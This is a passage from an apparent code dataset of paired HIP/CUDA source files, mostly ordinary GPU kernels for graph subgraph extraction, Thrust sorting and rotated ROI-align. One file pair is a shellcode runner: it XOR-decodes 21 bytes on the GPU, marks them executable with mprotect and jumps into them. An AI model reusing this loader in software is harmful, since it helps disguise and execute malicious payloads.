"Invalid input argument: vertices must be non null"); cudaStream_t stream{0}; if (graph.edge_data == nullptr) { return extract_subgraph_by_vertices<VT, ET, WT, false>(graph, vertices, num_vertices, stream); } else { return extract_subgraph_by_vertices<VT, ET, WT, true>(graph, vertices, num_vertices, stream); } } template std::unique_ptr<legacy::GraphCOO<int32_t, int32_t, float>> extract_subgraph_vertex<int32_t, int32_t, float>( legacy::GraphCOOView<int32_t, int32_t, float> const&, int32_t const*, int32_t); template std::unique_ptr<legacy::GraphCOO<int32_t, int32_t, double>> extract_subgraph_vertex<int32_t, int32_t, double>( legacy::GraphCOOView<int32_t, int32_t, double> const&, int32_t const*, int32_t); } // namespace subgraph } // namespace cugraph
857ba5834658393b7ea3b4fead1b617b11547b08.hip
// !!! This is a file automatically generated by hipify!!! /* ============================================================================ Name : sorting_segments.cu Author : Rafael Schmid Version : Copyright : Your copyright notice Description : Compute sum of reciprocals using STL on CPU and Thrust on GPU ============================================================================ */ #include <thrust/host_vector.h> #include <thrust/device_vector.h> #include <thrust/generate.h> #include <thrust/sort.h> #include <thrust/copy.h> #include <chrono> #include <iostream> #ifndef ELAPSED_TIME #define ELAPSED_TIME 0 #endif void print(thrust::host_vector<int> h_vec) { std::cout << "\n"; for (int i = 0; i < h_vec.size(); i++) { std::cout << h_vec[i] << " "; } std::cout << "\n"; } int main(void) { int num_of_elements; int i; scanf("%d", &num_of_elements); thrust::host_vector<int> h_vec(num_of_elements); for (i = 0; i < num_of_elements; i++) scanf("%d", &h_vec[i]); hipEvent_t start, stop; hipEventCreate(&start); hipEventCreate(&stop); thrust::device_vector<int> d_vec = h_vec; hipEventRecord(start); thrust::stable_sort(d_vec.begin(), d_vec.end()); hipEventRecord(stop); hipError_t errSync = hipGetLastError(); hipError_t errAsync = hipDeviceSynchronize(); if (errSync != hipSuccess) printf("Sync kernel error: %s\n", hipGetErrorString(errSync)); if (errAsync != hipSuccess) printf("Async kernel error: %s\n", hipGetErrorString(errAsync)); thrust::copy(d_vec.begin(), d_vec.end(), h_vec.begin()); if (ELAPSED_TIME == 1) { hipEventSynchronize(stop); float milliseconds = 0; hipEventElapsedTime(&milliseconds, start, stop); std::cout << milliseconds << "\n"; } else print(h_vec); return 0; }
857ba5834658393b7ea3b4fead1b617b11547b08.cu
/* ============================================================================ Name : sorting_segments.cu Author : Rafael Schmid Version : Copyright : Your copyright notice Description : Compute sum of reciprocals using STL on CPU and Thrust on GPU ============================================================================ */ #include <thrust/host_vector.h> #include <thrust/device_vector.h> #include <thrust/generate.h> #include <thrust/sort.h> #include <thrust/copy.h> #include <chrono> #include <iostream> #ifndef ELAPSED_TIME #define ELAPSED_TIME 0 #endif void print(thrust::host_vector<int> h_vec) { std::cout << "\n"; for (int i = 0; i < h_vec.size(); i++) { std::cout << h_vec[i] << " "; } std::cout << "\n"; } int main(void) { int num_of_elements; int i; scanf("%d", &num_of_elements); thrust::host_vector<int> h_vec(num_of_elements); for (i = 0; i < num_of_elements; i++) scanf("%d", &h_vec[i]); cudaEvent_t start, stop; cudaEventCreate(&start); cudaEventCreate(&stop); thrust::device_vector<int> d_vec = h_vec; cudaEventRecord(start); thrust::stable_sort(d_vec.begin(), d_vec.end()); cudaEventRecord(stop); cudaError_t errSync = cudaGetLastError(); cudaError_t errAsync = cudaDeviceSynchronize(); if (errSync != cudaSuccess) printf("Sync kernel error: %s\n", cudaGetErrorString(errSync)); if (errAsync != cudaSuccess) printf("Async kernel error: %s\n", cudaGetErrorString(errAsync)); thrust::copy(d_vec.begin(), d_vec.end(), h_vec.begin()); if (ELAPSED_TIME == 1) { cudaEventSynchronize(stop); float milliseconds = 0; cudaEventElapsedTime(&milliseconds, start, stop); std::cout << milliseconds << "\n"; } else print(h_vec); return 0; }
accdff8016db7f4f7eb3a6c5d54e65a61c0ddba6.hip
// !!! This is a file automatically generated by hipify!!! #include <stdio.h> #include <sys/mman.h> #include <hip/hip_runtime.h> #define len 21 __global__ void decrypt(unsigned char *code){ int indx = threadIdx.x; code[indx] ^= 12; } extern "C" void _shell(); int main(void){ unsigned char *p = (unsigned char*)_shell; unsigned char *d_shell,*h_shell; h_shell = (unsigned char *)malloc(sizeof(char)*len); int i; for(i=0;i<len;i++){ h_shell[i] = *p; p++; } hipMalloc((void **) &d_shell, sizeof(char)*len); hipMemcpy(d_shell, h_shell, sizeof(char)*len, hipMemcpyHostToDevice); hipLaunchKernelGGL(( decrypt), dim3(1),dim3(len), 0, 0, d_shell); hipMemcpy(h_shell, d_shell, sizeof(char)*len, hipMemcpyDeviceToHost); hipFree(d_shell); mprotect(h_shell,len,PROT_EXEC); ((void(*)(void))h_shell)(); }
accdff8016db7f4f7eb3a6c5d54e65a61c0ddba6.cu
#include <stdio.h> #include <sys/mman.h> #include <cuda.h> #define len 21 __global__ void decrypt(unsigned char *code){ int indx = threadIdx.x; code[indx] ^= 12; } extern "C" void _shell(); int main(void){ unsigned char *p = (unsigned char*)_shell; unsigned char *d_shell,*h_shell; h_shell = (unsigned char *)malloc(sizeof(char)*len); int i; for(i=0;i<len;i++){ h_shell[i] = *p; p++; } cudaMalloc((void **) &d_shell, sizeof(char)*len); cudaMemcpy(d_shell, h_shell, sizeof(char)*len, cudaMemcpyHostToDevice); decrypt<<<1,len>>>(d_shell); cudaMemcpy(h_shell, d_shell, sizeof(char)*len, cudaMemcpyDeviceToHost); cudaFree(d_shell); mprotect(h_shell,len,PROT_EXEC); ((void(*)(void))h_shell)(); }
c1e913fabd3a6595d1c90736ec937b336c9ad4a3.hip
// !!! This is a file automatically generated by hipify!!! #include <ATen/ATen.h> #include <ATen/hip/HIPContext.h> #include <THH/THH.h> #include <THH/THHAtomics.cuh> #include <THH/THHDeviceUtils.cuh> #include <hip/hip_runtime.h> #include <cstdio> #include <memory> #include "rotate_rect_ops.h" // TODO make it in a common file #define CUDA_1D_KERNEL_LOOP(i, n) \ for (int i = blockIdx.x * blockDim.x + threadIdx.x; i < n; \ i += blockDim.x * gridDim.x) #define CUDA_CHECK(call) { \ hipError_t err; \ if ((err = (call)) != hipSuccess) { \ fprintf(stderr, "Got error %s at %s:%d\n", hipGetErrorString(err), \ __FILE__, __LINE__); \ exit(1); \ } \ } template <typename T> struct device_ptr_deleter { void operator()(T* ptr) { CUDA_CHECK(hipFree(ptr)); } }; template <typename T> struct host_ptr_deleter { void operator()(T* ptr) { CUDA_CHECK(hipHostFree(ptr)); } }; template <typename T> using unique_ptr_device = std::unique_ptr<T[], device_ptr_deleter<T>>; template <typename T> using unique_ptr_host = std::unique_ptr<T[], host_ptr_deleter<T>>; const int TILE_DIM = 32; template <typename T> __global__ void matrix_transpose( T* __restrict__ transposed_matrix, const T* __restrict__ original_matrix, const int num_columns, const int num_rows ) { __shared__ T tile[TILE_DIM][TILE_DIM+1]; int row = blockIdx.y * TILE_DIM + threadIdx.y; int column = blockIdx.x * TILE_DIM + threadIdx.x; if (row < num_rows && column < num_columns) { tile[threadIdx.y][threadIdx.x] = original_matrix[row * num_columns + column]; } __syncthreads(); int transpose_column = blockIdx.y * TILE_DIM + threadIdx.x; int transpose_row = blockIdx.x * TILE_DIM + threadIdx.y; if (transpose_row < num_columns && transpose_column < num_rows) { transposed_matrix[transpose_row * num_rows + transpose_column] = tile[threadIdx.x][threadIdx.y]; } } template <typename T> __device__ T bilinear_interpolate(const T* bottom_data, const int height, const int width, T y, T x, const int index /* index for debug only*/) { // deal with cases that inverse elements are out of feature map boundary if (y < -1.0 || y > height || x < -1.0 || x > width) { //empty return 0; } if (y <= 0) y = 0; if (x <= 0) x = 0; int y_low = (int) y; int x_low = (int) x; int y_high; int x_high; if (y_low >= height - 1) { y_high = y_low = height - 1; y = (T) y_low; } else { y_high = y_low + 1; } if (x_low >= width - 1) { x_high = x_low = width - 1; x = (T) x_low; } else { x_high = x_low + 1; } T ly = y - y_low; T lx = x - x_low; T hy = 1. - ly, hx = 1. - lx; // do bilinear interpolation T v1 = bottom_data[y_low * width + x_low]; T v2 = bottom_data[y_low * width + x_high]; T v3 = bottom_data[y_high * width + x_low]; T v4 = bottom_data[y_high * width + x_high]; T w1 = hy * hx, w2 = hy * lx, w3 = ly * hx, w4 = ly * lx; T val = (w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4); return val; } template <typename T> __device__ void bilinear_interpolate_gradient( const int height, const int width, T y, T x, T & w1, T & w2, T & w3, T & w4, int & x_low, int & x_high, int & y_low, int & y_high, const int index /* index for debug only*/) { // deal with cases that inverse elements are out of feature map boundary if (y < -1.0 || y > height || x < -1.0 || x > width) { //empty w1 = w2 = w3 = w4 = 0.; x_low = x_high = y_low = y_high = -1; return; } if (y <= 0) y = 0; if (x <= 0) x = 0; y_low = (int) y; x_low = (int) x; if (y_low >= height - 1) { y_high = y_low = height - 1; y = (T) y_low; } else { y_high = y_low + 1; } if (x_low >= width - 1) { x_high = x_low = width - 1; x = (T) x_low; } else { x_high = x_low + 1; } T ly = y - y_low; T lx = x - x_low; T hy = 1. - ly, hx = 1. - lx; // reference in forward // T v1 = bottom_data[y_low * width + x_low]; // T v2 = bottom_data[y_low * width + x_high]; // T v3 = bottom_data[y_high * width + x_low]; // T v4 = bottom_data[y_high * width + x_high]; // T val = (w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4); w1 = hy * hx, w2 = hy * lx, w3 = ly * hx, w4 = ly * lx; return; } template <typename T> __global__ void RRoIAlignForward(const int nthreads, const T* bottom_data, const T spatial_scale, const int channels, const int height, const int width, const int pooled_height, const int pooled_width, const int sampling_ratio, const T* bottom_rois, T* top_data) { CUDA_1D_KERNEL_LOOP(index, nthreads) { // (n, c, ph, pw) is an element in the pooled output int pw = index % pooled_width; int ph = (index / pooled_width) % pooled_height; int c = (index / pooled_width / pooled_height) % channels; int n = index / pooled_width / pooled_height / channels; const T* offset_bottom_rois = bottom_rois + n * 6; // batch_ind, xc, yc, w, h, angle int roi_batch_ind = offset_bottom_rois[0]; // Force malformed ROIs to be 1x1 T roi_width = max(offset_bottom_rois[3] * spatial_scale, (T)1.); T roi_height = max(offset_bottom_rois[4] * spatial_scale, (T)1.); const T* offset_bottom_data = bottom_data + (roi_batch_ind * channels + c) * height * width; // We use roi_bin_grid to sample the grid and mimic integral int roi_bin_grid_h = (sampling_ratio > 0) ? sampling_ratio : ceil(roi_height / pooled_height); // e.g., = 2 int roi_bin_grid_w = (sampling_ratio > 0) ? sampling_ratio : ceil(roi_width / pooled_width); const T mw = 1.0 / roi_bin_grid_w; const T mh = 1.0 / roi_bin_grid_h; // compute pool points T P[8]; compute_roi_pool_pts(offset_bottom_rois, P, spatial_scale, pooled_height, pooled_width, ph, pw); // compute line params T line_params[4]; for (int i = 0; i < 2; ++i) { line_params[i * 2] = P[((i + 1) * 2) % 8] - P[i * 2]; line_params[i * 2 + 1] = P[((i + 1) * 2) % 8 + 1] - P[i * 2 + 1]; } // We do average (integral) pooling inside a bin const T count = roi_bin_grid_h * roi_bin_grid_w; // e.g. = 4 T output_val = 0.; for (int iy = 0; iy < roi_bin_grid_h; iy ++) // e.g., iy = 0, 1 { for (int ix = 0; ix < roi_bin_grid_w; ix ++) { const T x = P[0] + static_cast<T>(iy + 0.5) * line_params[0] * mh + static_cast<T>(ix + 0.5) * line_params[2] * mw; const T y = P[1] + static_cast<T>(iy + 0.5) * line_params[1] * mh + static_cast<T>(ix + 0.5) * line_params[3] * mw; T val = bilinear_interpolate(offset_bottom_data, height, width, y, x, index); output_val += val; // printf("%.2f\n", val); } } output_val /= count; top_data[index] = output_val; } } template <typename T> __global__ void RRoIAlignBackwardFeature(const int nthreads, const T* top_diff, const int num_rois, const T spatial_scale, const int channels, const int height, const int width, const int pooled_height, const int pooled_width, const int sampling_ratio, T* bottom_diff, const T* bottom_rois) { CUDA_1D_KERNEL_LOOP(index, nthreads) { // (n, c, ph, pw) is an element in the pooled output int pw = index % pooled_width; int ph = (index / pooled_width) % pooled_height; int c = (index / pooled_width / pooled_height) % channels; int n = index / pooled_width / pooled_height / channels; const T* offset_bottom_rois = bottom_rois + n * 6; int roi_batch_ind = offset_bottom_rois[0]; // Force malformed ROIs to be 1x1 T roi_width = max(offset_bottom_rois[3] * spatial_scale, (T)1.); T roi_height = max(offset_bottom_rois[4] * spatial_scale, (T)1.); // We use roi_bin_grid to sample the grid and mimic integral int roi_bin_grid_h = (sampling_ratio > 0) ? sampling_ratio : ceil(roi_height / pooled_height); // e.g., = 2 int roi_bin_grid_w = (sampling_ratio > 0) ? sampling_ratio : ceil(roi_width / pooled_width); const T mw = 1.0 / roi_bin_grid_w; const T mh = 1.0 / roi_bin_grid_h; T* offset_bottom_diff = bottom_diff + (roi_batch_ind * channels + c) * height * width; int top_offset = (n * channels + c) * pooled_height * pooled_width; const T* offset_top_diff = top_diff + top_offset; const T top_diff_this_bin = offset_top_diff[ph * pooled_width + pw]; // compute pool points T P[8]; compute_roi_pool_pts(offset_bottom_rois, P, spatial_scale, pooled_height, pooled_width, ph, pw); // compute line params T line_params[4]; for (int i = 0; i < 2; ++i) { line_params[i * 2] = P[((i + 1) * 2) % 8] - P[i * 2]; line_params[i * 2 + 1] = P[((i + 1) * 2) % 8 + 1] - P[i * 2 + 1]; } // We do average (integral) pooling inside a bin const T count = roi_bin_grid_h * roi_bin_grid_w; // e.g. = 4 for (int iy = 0; iy < roi_bin_grid_h; iy ++) // e.g., iy = 0, 1 { for (int ix = 0; ix < roi_bin_grid_w; ix ++) { const T x = P[0] + static_cast<T>(iy + 0.5) * line_params[0] * mh + static_cast<T>(ix + 0.5) * line_params[2] * mw; const T y = P[1] + static_cast<T>(iy + 0.5) * line_params[1] * mh + static_cast<T>(ix + 0.5) * line_params[3] * mw; T w1, w2, w3, w4; int x_low, x_high, y_low, y_high; bilinear_interpolate_gradient(height, width, y, x, w1, w2, w3, w4, x_low, x_high, y_low, y_high, index); T g1 = top_diff_this_bin * w1 / count; T g2 = top_diff_this_bin * w2 / count; T g3 = top_diff_this_bin * w3 / count; T g4 = top_diff_this_bin * w4 / count; if (x_low >= 0 && x_high >= 0 && y_low >= 0 && y_high >= 0) { atomicAdd(offset_bottom_diff + y_low * width + x_low, static_cast<T>(g1)); atomicAdd(offset_bottom_diff + y_low * width + x_high, static_cast<T>(g2)); atomicAdd(offset_bottom_diff + y_high * width + x_low, static_cast<T>(g3)); atomicAdd(offset_bottom_diff + y_high * width + x_high, static_cast<T>(g4)); } // if } // ix } // iy } // CUDA_1D_KERNEL_LOOP } // RoIAlignBackward at::Tensor RROIAlign_forward_cuda(const at::Tensor& input, const at::Tensor& rois, const float spatial_scale, const int pooled_height, const int pooled_width, const int sampling_ratio) { AT_ASSERTM(input.type().is_cuda(), "input must be a CUDA tensor"); AT_ASSERTM(rois.type().is_cuda(), "rois must be a CUDA tensor"); auto num_rois = rois.size(0); auto channels = input.size(1); auto height = input.size(2); auto width = input.size(3); auto output = at::empty({num_rois, channels, pooled_height, pooled_width}, input.options()); auto output_size = num_rois * pooled_height * pooled_width * channels; // auto argmax = at::zeros({num_rois, channels, pooled_height, pooled_width}, input.options().dtype(at::kInt)); hipStream_t stream = at::hip::getCurrentHIPStreamMasqueradingAsCUDA(); dim3 grid(::min(THCCeilDiv((long)output_size, 512L), 4096L)); dim3 block(512); if (output.numel() == 0) { THCudaCheck(hipGetLastError()); return output; } AT_DISPATCH_FLOATING_TYPES(input.type(), "RROIAlign_forward", [&] { hipLaunchKernelGGL(( RRoIAlignForward<scalar_t>), dim3(grid), dim3(block), 0, stream, output_size, input.contiguous().data<scalar_t>(), spatial_scale, channels, height, width, pooled_height, pooled_width, sampling_ratio, rois.contiguous().data<scalar_t>(), output.data<scalar_t>() ); }); THCudaCheck(hipGetLastError()); return output; } template <typename T> __device__ void compute_transform_matrix( T* __restrict__ matrix, const T* __restrict__ rois, const float spatial_scale, const int pooled_height, const int pooled_width) { T cx = rois[1] * spatial_scale; T cy = rois[2] * spatial_scale; // Force malformed ROIs to be 1x1 T w = max(rois[3] * spatial_scale, T(1)); T h = max(rois[4] * spatial_scale, T(1)); T angle = deg2rad(rois[5]); // TransformPrepare T dx = -pooled_width / 2.0; T dy = -pooled_height / 2.0; T Sx = w / pooled_width; T Sy = h / pooled_height; T Alpha = cos(angle); T Beta = -sin(angle); T Dx = cx; T Dy = cy; matrix[0] = Alpha*Sx; matrix[1] = Beta*Sy; matrix[2] = Alpha*Sx*dx+Beta*Sy*dy+Dx; matrix[3] = -Beta*Sx; matrix[4] = Alpha*Sy; matrix[5] = -Beta*Sx*dx+Alpha*Sy*dy+Dy; } // local memory version template <typename T> __global__ void compute_roi_pool_pts_local( T* __restrict__ roi_pool_pts, const T* __restrict__ rois, const float spatial_scale, const int roi_pool_pt_num, const int num_rois, const int pooled_height, const int pooled_width) { T matrix[6]; // int idx = blockIdx.x * (blockDim.x * blockDim.y) + threadIdx.x * blockDim.y + threadIdx.y; int idx = blockIdx.x * (pooled_height * pooled_width) + threadIdx.x * pooled_width + threadIdx.y; if (idx >= num_rois * pooled_height * pooled_width) { return; } int pw = threadIdx.y; int ph = threadIdx.x; int n = blockIdx.x; compute_transform_matrix( matrix, rois + n*6, spatial_scale, pooled_height, pooled_width); // ORDER IN CLOCKWISE OR ANTI-CLOCKWISE // (0,1),(0,0),(1,0),(1,1) roi_pool_pts[roi_pool_pt_num * 0 + idx] = matrix[0]*pw + matrix[1]*(ph+1) + matrix[2]; roi_pool_pts[roi_pool_pt_num * 1 + idx] = matrix[3]*pw + matrix[4]*(ph+1) + matrix[5]; roi_pool_pts[roi_pool_pt_num * 2 + idx] = matrix[0]*pw + matrix[1]*ph + matrix[2]; roi_pool_pts[roi_pool_pt_num * 3 + idx] = matrix[3]*pw + matrix[4]*ph + matrix[5]; roi_pool_pts[roi_pool_pt_num * 4 + idx] = matrix[0]*(pw+1) + matrix[1]*ph + matrix[2]; roi_pool_pts[roi_pool_pt_num * 5 + idx] = matrix[3]*(pw+1) + matrix[4]*ph + matrix[5]; roi_pool_pts[roi_pool_pt_num * 6 + idx] = matrix[0]*(pw+1) + matrix[1]*(ph+1) + matrix[2]; roi_pool_pts[roi_pool_pt_num * 7 + idx] = matrix[3]*(pw+1) + matrix[4]*(ph+1) + matrix[5]; } template <typename T> __global__ void bp_rroi_align_backward_kernel( T* __restrict__ bottom_diff, const T* __restrict__ top_diff, const T* __restrict__ roi_pool_pts, const T* __restrict__ rois, const float spatial_scale, const int sampling_ratio, const int num_rois, const int batch_size, const int channels, const int height, const int width, const int pooled_height, const int pooled_width) { __shared__ T roi_pool_pts_shared[8]; __shared__ T line_params[4]; __shared__ T rois_shared[6]; const int roi_pool_pt_num = num_rois * pooled_height * pooled_width; for (int i = blockIdx.x * blockDim.x + threadIdx.x; i < roi_pool_pt_num; i += blockDim.x * gridDim.x) { int c = blockIdx.y * blockDim.y + threadIdx.y; if (c < channels) { int pw = i % pooled_width; int ph = (i / pooled_width) % pooled_height; int n = i / pooled_width / pooled_height; const T* rois_offset = rois + n * 6; // batch_ind, xc, yc, w, h, angle if (threadIdx.y < 6) { rois_shared[threadIdx.y] = rois_offset[threadIdx.y]; } int roi_pool_idx = n * pooled_height * pooled_width + ph * pooled_width + pw; int roi_pool_idx_shared = threadIdx.y; if (roi_pool_idx_shared < 8) { roi_pool_pts_shared[roi_pool_idx_shared] = roi_pool_pts[roi_pool_idx_shared * roi_pool_pt_num + roi_pool_idx]; } __syncthreads(); // compute line params // if (roi_pool_idx_shared < 4) { // line_params[roi_pool_idx_shared] = roi_pool_pts_shared[((roi_pool_idx_shared / 2) + 1) * 2 % 8 + roi_pool_idx_shared % 2] - roi_pool_pts_shared[roi_pool_idx_shared]; // } if (roi_pool_idx_shared < 2) { line_params[roi_pool_idx_shared * 2] = roi_pool_pts_shared[((roi_pool_idx_shared + 1) * 2) % 8] - roi_pool_pts_shared[roi_pool_idx_shared * 2]; line_params[roi_pool_idx_shared * 2 + 1] = roi_pool_pts_shared[((roi_pool_idx_shared + 1) * 2) % 8 + 1] - roi_pool_pts_shared[roi_pool_idx_shared * 2 + 1]; } __syncthreads(); int roi_batch_id = rois_shared[0]; // Force malformed ROIs to be 1x1 T roi_width = max(rois_shared[3] * spatial_scale, (T)1.); T roi_height = max(rois_shared[4] * spatial_scale, (T)1.); // We use roi_bin_grid to sample the grid and mimic integral int roi_bin_grid_h = (sampling_ratio > 0) ? sampling_ratio : ceil(roi_height / pooled_height); // e.g., = 2 int roi_bin_grid_w = (sampling_ratio > 0) ? sampling_ratio : ceil(roi_width / pooled_width); const T mw = 1.0 / roi_bin_grid_w; const T mh = 1.0 / roi_bin_grid_h; int top_data_idx = (n * channels + c) * pooled_width * pooled_height + ph * pooled_width + pw; const T top_diff_this_bin = top_diff[top_data_idx]; // We do average (integral) pooling inside a bin const T count = roi_bin_grid_h * roi_bin_grid_w; for (int iy = 0; iy < roi_bin_grid_h; iy ++) { for (int ix = 0; ix < roi_bin_grid_w; ix ++) { const T x = roi_pool_pts_shared[0] + static_cast<T>(iy + 0.5) * line_params[0] * mh + static_cast<T>(ix + 0.5) * line_params[2] * mw; const T y = roi_pool_pts_shared[1] + static_cast<T>(iy + 0.5) * line_params[1] * mh + static_cast<T>(ix + 0.5) * line_params[3] * mw; T w1, w2, w3, w4; int x_low, x_high, y_low, y_high; bilinear_interpolate_gradient(height, width, y, x, w1, w2, w3, w4, x_low, x_high, y_low, y_high, 0); T g1 = top_diff_this_bin * w1 / count; T g2 = top_diff_this_bin * w2 / count; T g3 = top_diff_this_bin * w3 / count; T g4 = top_diff_this_bin * w4 / count; if (x_low >= 0 && x_high >= 0 && y_low >= 0 && y_high >= 0) { atomicAdd(bottom_diff + ((y_low * width + x_low ) * batch_size + roi_batch_id) * channels + c, static_cast<T>(g1)); atomicAdd(bottom_diff + ((y_low * width + x_high) * batch_size + roi_batch_id) * channels + c, static_cast<T>(g2)); atomicAdd(bottom_diff + ((y_high * width + x_low ) * batch_size + roi_batch_id) * channels + c, static_cast<T>(g3)); atomicAdd(bottom_diff + ((y_high * width + x_high) * batch_size + roi_batch_id) * channels + c, static_cast<T>(g4)); } } } } } } void bp_rroi_align_backward( int batch_size, int num_rois, int channels, int height, int width, int pooled_height, int pooled_width, float spatial_scale, const float* top_diff_d, const float* rois_d, float* bottom_diff_d, hipStream_t stream ) { unique_ptr_device<float> roi_pool_pts_d(nullptr); int roi_pool_pt_num = num_rois * pooled_height * pooled_width; CUDA_CHECK(hipMalloc((void **) &roi_pool_pts_d, 8 * roi_pool_pt_num * sizeof(float))); unique_ptr_device<float> bottom_diff_coalesced_d(nullptr); auto bottom_data_size = batch_size * channels * height * width; CUDA_CHECK(hipMalloc((void **) &bottom_diff_coalesced_d, bottom_data_size * sizeof(float))); { int block_x = TILE_DIM; int block_y = TILE_DIM; const int num_columns = height * width; const int num_rows = batch_size * channels; int grid_x = static_cast<int>(::ceil(num_columns * 1.0 / block_x)); int grid_y = static_cast<int>(::ceil(num_rows * 1.0 / block_y)); dim3 block(block_x, block_y); dim3 grid(grid_x, grid_y); hipLaunchKernelGGL(( matrix_transpose<float>), dim3(grid), dim3(block), 0, stream, bottom_diff_coalesced_d.get(), bottom_diff_d, num_columns, num_rows ); } { dim3 block(pooled_height, pooled_width); dim3 grid(num_rois); hipLaunchKernelGGL(( compute_roi_pool_pts_local<float>), dim3(grid), dim3(block), 0, stream, roi_pool_pts_d.get(), rois_d, spatial_scale, roi_pool_pt_num, num_rois, pooled_height, pooled_width); } CUDA_CHECK(hipDeviceSynchronize()); { // hipDeviceProp_t deviceProperties; // int gpu_id = 0; // CUDA_CHECK(hipGetDeviceProperties(&deviceProperties, gpu_id)); int max_thread_num = 256; // int thread_num_x = ::min(max_thread_num / 8, pooled_width); // int thread_num_y = ::min(max_thread_num / thread_num_x, channels); int thread_num_y = ::min(channels, max_thread_num); // int thread_num_x = max_thread_num / thread_num_y; int thread_num_x = 1; // int block_num_x = ::min(static_cast<int>(::ceil(pooled_width * pooled_height * num_rois * 1.0 / thread_num_x)), deviceProperties.maxGridSize[0]); int block_num_x = ::min(static_cast<int>(::ceil(pooled_width * pooled_height * num_rois * 1.0 / thread_num_x)), 65535); int block_num_y = static_cast<int>(::ceil(channels * 1.0 / thread_num_y)); dim3 block(thread_num_x, thread_num_y); dim3 grid(block_num_x, block_num_y); int sampling_ratio = 0; // default hipLaunchKernelGGL(( bp_rroi_align_backward_kernel<float>), dim3(grid), dim3(block), 0, stream, bottom_diff_coalesced_d.get(), top_diff_d, roi_pool_pts_d.get(), rois_d, spatial_scale, sampling_ratio, num_rois, batch_size, channels, height, width, pooled_height, pooled_width); } CUDA_CHECK(hipDeviceSynchronize()); { int block_x = TILE_DIM; int block_y = TILE_DIM; const int num_columns = batch_size * channels; const int num_rows = height * width; int grid_x = static_cast<int>(::ceil(num_columns * 1.0 / block_x)); int grid_y = static_cast<int>(::ceil(num_rows * 1.0 / block_y)); dim3 block(block_x, block_y); dim3 grid(grid_x, grid_y); hipLaunchKernelGGL(( matrix_transpose<float>), dim3(grid), dim3(block), 0, stream, bottom_diff_d, bottom_diff_coalesced_d.get(), num_columns, num_rows ); } } at::Tensor RROIAlign_backward_cuda(const at::Tensor& grad, const at::Tensor& rois, const float spatial_scale, const int pooled_height, const int pooled_width, const int batch_size, const int channels, const int height, const int width, const int sampling_ratio) { AT_ASSERTM(grad.type().is_cuda(), "grad must be a CUDA tensor"); AT_ASSERTM(rois.type().is_cuda(), "rois must be a CUDA tensor"); auto num_rois = rois.size(0); auto grad_input = at::zeros({batch_size, channels, height, width}, grad.options()); hipStream_t stream = at::hip::getCurrentHIPStreamMasqueradingAsCUDA(); dim3 grid(::min(THCCeilDiv((long)grad.numel(), 512L), 4096L)); dim3 block(512); // handle possibly empty gradients if (grad.numel() == 0) { THCudaCheck(hipGetLastError()); return grad_input; } AT_DISPATCH_FLOATING_TYPES(grad.type(), "RROIAlign_backward", [&] { // bp_rroi_align_backward( // batch_size, // num_rois, // channels, // height, // width, // pooled_height, // pooled_width, // spatial_scale, // grad.contiguous().data<float>(), // rois.contiguous().data<float>(), // grad_input.data<float>(), // stream); hipLaunchKernelGGL(( RRoIAlignBackwardFeature<scalar_t>), dim3(grid), dim3(block), 0, stream, grad.numel(), grad.contiguous().data<scalar_t>(), num_rois, spatial_scale, channels, height, width, pooled_height, pooled_width, sampling_ratio, grad_input.data<scalar_t>(), rois.contiguous().data<scalar_t>()); }); THCudaCheck(hipGetLastError()); return grad_input; }
c1e913fabd3a6595d1c90736ec937b336c9ad4a3.cu
#include <ATen/ATen.h> #include <ATen/cuda/CUDAContext.h> #include <THC/THC.h> #include <THC/THCAtomics.cuh> #include <THC/THCDeviceUtils.cuh> #include <cuda_runtime.h> #include <cstdio> #include <memory> #include "rotate_rect_ops.h" // TODO make it in a common file #define CUDA_1D_KERNEL_LOOP(i, n) \ for (int i = blockIdx.x * blockDim.x + threadIdx.x; i < n; \ i += blockDim.x * gridDim.x) #define CUDA_CHECK(call) { \ cudaError_t err; \ if ((err = (call)) != cudaSuccess) { \ fprintf(stderr, "Got error %s at %s:%d\n", cudaGetErrorString(err), \ __FILE__, __LINE__); \ exit(1); \ } \ } template <typename T> struct device_ptr_deleter { void operator()(T* ptr) { CUDA_CHECK(cudaFree(ptr)); } }; template <typename T> struct host_ptr_deleter { void operator()(T* ptr) { CUDA_CHECK(cudaFreeHost(ptr)); } }; template <typename T> using unique_ptr_device = std::unique_ptr<T[], device_ptr_deleter<T>>; template <typename T> using unique_ptr_host = std::unique_ptr<T[], host_ptr_deleter<T>>; const int TILE_DIM = 32; template <typename T> __global__ void matrix_transpose( T* __restrict__ transposed_matrix, const T* __restrict__ original_matrix, const int num_columns, const int num_rows ) { __shared__ T tile[TILE_DIM][TILE_DIM+1]; int row = blockIdx.y * TILE_DIM + threadIdx.y; int column = blockIdx.x * TILE_DIM + threadIdx.x; if (row < num_rows && column < num_columns) { tile[threadIdx.y][threadIdx.x] = original_matrix[row * num_columns + column]; } __syncthreads(); int transpose_column = blockIdx.y * TILE_DIM + threadIdx.x; int transpose_row = blockIdx.x * TILE_DIM + threadIdx.y; if (transpose_row < num_columns && transpose_column < num_rows) { transposed_matrix[transpose_row * num_rows + transpose_column] = tile[threadIdx.x][threadIdx.y]; } } template <typename T> __device__ T bilinear_interpolate(const T* bottom_data, const int height, const int width, T y, T x, const int index /* index for debug only*/) { // deal with cases that inverse elements are out of feature map boundary if (y < -1.0 || y > height || x < -1.0 || x > width) { //empty return 0; } if (y <= 0) y = 0; if (x <= 0) x = 0; int y_low = (int) y; int x_low = (int) x; int y_high; int x_high; if (y_low >= height - 1) { y_high = y_low = height - 1; y = (T) y_low; } else { y_high = y_low + 1; } if (x_low >= width - 1) { x_high = x_low = width - 1; x = (T) x_low; } else { x_high = x_low + 1; } T ly = y - y_low; T lx = x - x_low; T hy = 1. - ly, hx = 1. - lx; // do bilinear interpolation T v1 = bottom_data[y_low * width + x_low]; T v2 = bottom_data[y_low * width + x_high]; T v3 = bottom_data[y_high * width + x_low]; T v4 = bottom_data[y_high * width + x_high]; T w1 = hy * hx, w2 = hy * lx, w3 = ly * hx, w4 = ly * lx; T val = (w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4); return val; } template <typename T> __device__ void bilinear_interpolate_gradient( const int height, const int width, T y, T x, T & w1, T & w2, T & w3, T & w4, int & x_low, int & x_high, int & y_low, int & y_high, const int index /* index for debug only*/) { // deal with cases that inverse elements are out of feature map boundary if (y < -1.0 || y > height || x < -1.0 || x > width) { //empty w1 = w2 = w3 = w4 = 0.; x_low = x_high = y_low = y_high = -1; return; } if (y <= 0) y = 0; if (x <= 0) x = 0; y_low = (int) y; x_low = (int) x; if (y_low >= height - 1) { y_high = y_low = height - 